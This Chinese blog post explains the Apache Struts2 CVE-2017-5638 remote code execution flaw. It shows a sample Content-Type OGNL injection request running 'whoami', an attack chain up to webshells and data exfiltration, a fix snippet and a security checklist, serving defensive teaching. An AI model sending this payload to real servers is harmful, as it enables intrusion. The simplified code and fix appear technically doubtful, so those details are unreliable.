Apache Struts2 漏洞(CVE-2017-5638)技术分析

一、漏洞简介

CVE-2017-5638 是 Apache Struts2 中的一个远程命令执行漏洞,攻击者可以通过构造特定的 HTTP 请求头,利用Struts的 OGNL 表达式解析机制,在服务器端执行任意代码。

二、漏洞触发场景

漏洞存在于 Struts2 的 Jakarta Multipart Parser 组件中,当服务器解析 HTTP 请求时,会对某些请求头进行OGNL解析,例如 Content-Type 请求头。

漏洞关键代码

java 复制代码
LocalizedMessage buildErrorMessage(Throwable e, Object[] args) {
    String errorKey = "struts.messages.upload.error." + e.getClass().getSimpleName();
    return new LocalizedMessage(this.getClass(), errorKey, args);
}

上述过程中,Struts2 会尝试使用 OGNL 解析 errorKey,攻击者若插入恶意OGNL代码即可执行。

三、攻击示例分析

攻击者发送恶意 HTTP 请求:

http 复制代码
POST /upload.action HTTP/1.1
Host: vulnerable-server
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec('whoami'))}

Payload核心解释

  • %{}: OGNL表达式标记。
  • 绕过安全限制并执行Java运行时命令。

四、实际攻击链路

  1. 构造恶意请求远程执行命令。
  2. 上传WebShell,持续控制服务器。
  3. 横向移动获取更多权限。
  4. 数据外传与泄露。

五、漏洞修复方案

修复代码示例:

java 复制代码
String errorKey = "struts.messages.upload.error." + StringEscapeUtils.escapeJava(e.getClass().getSimpleName());

修复措施原理:避免OGNL解析,采用字符串转义。

六、关键反思

  • 漏洞管理流程需及时。
  • 权限控制必须合理。
  • 安全监控系统需正常运作。

七、企业安全建议 checklist

事项 实施情况(✅/❌)
定期检查第三方库版本与漏洞更新
使用自动化工具追踪漏洞
落实WAF规则过滤常见攻击
严格实施最小权限原则
定期安全培训与演练
静态代码分析(SAST) 库博静态代码分析工具
相关推荐
vx_Biye_Design1 分钟前
基于Spring Boot+vue的湖北旅游景点门票预约平台的设计--毕设附源码29593
java·vue.js·spring boot·spring cloud·servlet·eclipse·课程设计
hay_lee20 分钟前
Spring AI实现对话聊天-流式输出
java·人工智能·ollama·spring ai
Hx_Ma1625 分钟前
SpringBoot数据源自动管理
java·spring boot·spring
SunnyDays101126 分钟前
Java 高效实现 CSV 转 Excel
java·csv转excel
starfire_hit27 分钟前
JAVAWEB根据前台请求获取用户IP
java·服务器·网络
fengxin_rou29 分钟前
[Redis从零到精通|第四篇]:缓存穿透、雪崩、击穿
java·redis·缓存·mybatis·idea·多线程
像少年啦飞驰点、32 分钟前
从零开始学 RabbitMQ:小白也能懂的消息队列实战指南
java·spring boot·微服务·消息队列·rabbitmq·异步编程
宠友信息40 分钟前
2025社交+IM及时通讯社区APP仿小红书小程序
java·spring boot·小程序·uni-app·web app
java1234_小锋40 分钟前
Java高频面试题:Spring和SpringBoot的关系和区别?
java·spring boot·spring
风指引着方向42 分钟前
昇腾算子性能调优:ops-nn 中的内存布局与向量化技巧
java·大数据·人工智能